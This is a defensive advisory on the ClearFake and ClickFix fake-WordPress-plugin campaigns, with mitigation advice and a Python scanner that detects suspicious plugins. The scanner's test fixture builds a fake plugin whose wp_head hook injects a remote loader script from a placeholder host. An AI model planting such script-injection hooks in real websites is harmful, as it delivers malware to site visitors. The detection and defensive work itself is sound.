Introduction
WordPress websites have increasingly become targets for cyberattacks, with hackers exploiting vulnerabilities to install malicious plugins. These plugins deceive users into downloading malware that steals information. Two notable campaigns, ClearFake and ClickFix [7], have been identified [1] [3], each employing distinct tactics to compromise websites and spread malware.
Description
WordPress websites have increasingly become prime targets for hackers, who exploit vulnerabilities to install malicious plugins that deceive users into downloading information-stealing malware. The ClearFake campaign has been active since early 2023 [4], displaying counterfeit web browser update notifications on compromised sites to spread this malware [4]. It has impacted over 6,000 sites, with attackers gaining access through stolen or purchased administrator credentials and then installing seemingly legitimate plugins that mimic well-known tools such as Wordfence Security, Google SEO Enhancer [2] and LiteSpeed Cache [1] [7] [9], or that use generic names such as “Universal Popup Plugin.” These harmful plugins [7] look innocuous and contain only a minimal set of files, which helps them evade detection by site administrators [10]. Once installed, they inject malicious JavaScript into the websites’ HTML [3] [5] [9], loading scripts from a Binance Smart Chain (BSC) smart contract [3] [7]; those scripts display fake update banners that steal sensitive data or perform other malicious actions while masquerading as harmless updates [1].
In June 2024 [10], a new variant called ClickFix emerged [2], which presents fake software error alerts that offer deceptive solutions [4]. These “solutions” are actually PowerShell scripts that [4] [7], when executed, download and install information-stealing malware [4] [7], including remote access trojans (RATs) and infostealers such as Vidar Stealer and Lumma Stealer [10]. The ClickFix campaign has been linked to the ClearFake initiative but operates differently, relying on social engineering to trick users into executing malicious code themselves [3]. Attackers breach websites to display banners with fake error messages for popular platforms such as Google Chrome [4], Google Meet [4] [7] and Facebook [3] [4] [7], as well as fake captcha pages [4] [9], misleading users into downloading malware disguised as software fixes [3]. This campaign has compromised over 25,000 sites globally since August 2023, with more than 6,000 infections occurring since June 2024 [10]. The attackers primarily leverage stolen WordPress admin credentials rather than exploiting known vulnerabilities [10]; log analysis indicates no direct exploitation of the WordPress ecosystem [10]. The entire process is automated [1], underscoring the significant threat to website administrators and their users [1].
Indicators of compromise (IoCs) include the presence of .DS_Store files [10], which are typically harmless but can signal a malicious plugin installation [10]. The use of valid WordPress admin credentials suggests that the hackers obtained them through methods such as brute-force attacks [10], phishing [6] [7] [8] [9] [10], or malware infections on the administrators’ devices [10]. Researchers have identified malicious plugins with consistent naming patterns [8], such as “Advanced User Manager” and “Quick Cache Cleaner,” which contain harmful JavaScript that injects malicious code into websites [8]. The fake plugins are systematically generated to load scripts using the wp_enqueue_scripts hook [8], disguising their malicious intent with the wp_head hook [8]. To mitigate these risks [10], administrators should use strong, unique passwords [2] [7] and implement multi-factor authentication [10], and users should remain vigilant against suspicious installation messages and unexpected download prompts [2]. Website administrators are also advised to review their installed plugins and remove any that they did not personally install [7], and to reset admin user passwords to unique values [7]. Organizations operating WordPress sites that have received reports of fake site alerts are encouraged to review their installed plugins [5]. GoDaddy has provided IoCs to help identify affected websites.
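The plugin review recommended above can be partly automated. The following triage script is an added example written for this page; it is not code from GoDaddy or any of the cited reports. It walks a wp-content/plugins directory and flags the indicators the reports describe: a stray .DS_Store file, a plugin made of only one or two files, a plugin header whose name matches one of the fake plugin names listed above, and a wp_head or wp_enqueue_scripts hook in a file that also emits an inline script tag or enqueues a remote script URL. The file-count threshold, the regexes and the two sample plugins it builds in a temporary directory (including the loader URL example.invalid) are constructed for the example and are heuristics, not a complete signature set.

```python
"""Triage scanner for installed WordPress plugins (added example, not from
the advisory's sources). Flags the indicators the advisory describes; the
thresholds, regexes and sample plugins below are constructed assumptions."""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Fake plugin names reported in the advisory text; assumed incomplete.
SUSPICIOUS_NAMES = {
    "wordfence security", "google seo enhancer", "litespeed cache",
    "universal popup plugin", "advanced user manager", "quick cache cleaner",
}
HOOK_RE = re.compile(r"add_action\(\s*['\"](wp_head|wp_enqueue_scripts)['\"]")
INLINE_SCRIPT_RE = re.compile(r"<script[^>]*>", re.I)          # echoed <script ...>
REMOTE_SCRIPT_RE = re.compile(r"wp_enqueue_script\([^)]*https?://", re.I)
MIN_FILES = 3  # plugins with fewer real files than this are flagged (assumed)


@dataclass
class Finding:
    plugin: str
    reasons: list = field(default_factory=list)


def scan_plugin(path):
    """Return a Finding for one plugin directory; empty reasons means clean."""
    finding = Finding(os.path.basename(path))
    files = [os.path.join(root, n) for root, _d, names in os.walk(path) for n in names]
    if any(os.path.basename(p) == ".DS_Store" for p in files):
        finding.reasons.append("ds_store_present")
    if len([p for p in files if os.path.basename(p) != ".DS_Store"]) < MIN_FILES:
        finding.reasons.append("minimal_file_count")
    for p in files:
        if not p.endswith(".php"):
            continue
        with open(p, encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        # Plugin header name compared against the reported fake names.
        m = re.search(r"Plugin Name:\s*(.+)", src)
        if m and m.group(1).strip().lower() in SUSPICIOUS_NAMES:
            finding.reasons.append("name_matches_reported_fake:" + m.group(1).strip())
        # Hook on wp_head / wp_enqueue_scripts combined with script emission.
        hooks = HOOK_RE.findall(src)
        if hooks and (INLINE_SCRIPT_RE.search(src) or REMOTE_SCRIPT_RE.search(src)):
            finding.reasons.append("script_injection_via_" + "/".join(sorted(set(hooks))))
    return finding


def scan_plugins_dir(plugins_dir):
    """Scan every plugin under wp-content/plugins; return only flagged plugins."""
    flagged = []
    for name in sorted(os.listdir(plugins_dir)):
        p = os.path.join(plugins_dir, name)
        if os.path.isdir(p):
            result = scan_plugin(p)
            if result.reasons:
                flagged.append(result)
    return flagged


def build_sample_plugins_dir():
    """Create a constructed plugins directory: one benign plugin, one fake one."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    benign = os.path.join(base, "hello-world")
    os.makedirs(os.path.join(benign, "js"))
    with open(os.path.join(benign, "hello-world.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Hello World\n*/\n"
                 "add_action('wp_enqueue_scripts', 'hw_assets');\n"
                 "function hw_assets() { wp_enqueue_script('hw', "
                 "plugins_url('js/app.js', __FILE__)); }\n")
    with open(os.path.join(benign, "readme.txt"), "w") as fh:
        fh.write("Constructed benign plugin.\n")
    with open(os.path.join(benign, "js", "app.js"), "w") as fh:
        fh.write("console.log('hello');\n")
    fake = os.path.join(base, "quick-cache-cleaner")
    os.makedirs(fake)
    with open(os.path.join(fake, "quick-cache-cleaner.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Quick Cache Cleaner\n*/\n"
                 "add_action('wp_head', 'qcc_inject');\n"
                 "function qcc_inject() { echo '<script src=\"https://example.invalid"
                 "/loader.js\"></script>'; }\n")  # constructed placeholder URL
    open(os.path.join(fake, ".DS_Store"), "w").close()
    return base


if __name__ == "__main__":
    for f in scan_plugins_dir(build_sample_plugins_dir()):
        print(f.plugin, "->", ", ".join(f.reasons))
```

Point scan_plugins_dir() at a real wp-content/plugins directory to get a list of plugins worth a manual look; a hit is a prompt for review, not proof of compromise, since legitimate plugins may legitimately print inline scripts from wp_head.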
Conclusion
The ClearFake and ClickFix campaigns highlight the evolving threat landscape for WordPress websites, emphasizing the need for robust security measures. Administrators must adopt strong, unique passwords and multi-factor authentication to safeguard against unauthorized access. Regular reviews of installed plugins and vigilance against suspicious activities are crucial. As cyber threats continue to evolve, proactive measures and awareness are essential to protect websites and their users from potential compromises.
References
[1] https://www.techradar.com/pro/security/thousands-of-wordpress-websites-hacked-via-plugin-that-looks-to-steal-user-data
[2] https://www.pcworld.com/article/2497450/hackers-infect-thousands-of-wordpress-sites-with-malware-plugins.html
[3] https://www.bitdefender.com/en-gb/blog/hotforsecurity/cybercriminals-hijack-over-6-000-wordpress-sites-to-distribute-malware/
[4] https://www.isss.org.uk/news/over-6000-wordpress-hacked-to-install-plugins-pushing-infostealers/
[5] https://insight.scmagazineuk.com/thousands-of-wordpress-sites-compromised-with-malicious-plugins
[6] https://www.darkreading.com/endpoint-security/swarms-fake-wordpress-plug-ins-infect-sites-infostealers
[7] https://nsaneforums.com/news/security-privacy-news/over-6000-wordpress-hacked-to-install-plugins-pushing-infostealers-r26117/
[8] https://cyberpress.org/clickfix-malware-infects-visitors-through-hacked/
[9] https://intruceptlabs.com/2024/10/advisory-int-ia-009/
[10] https://thecyberexpress.com/fake-wordpress-plugins-malware/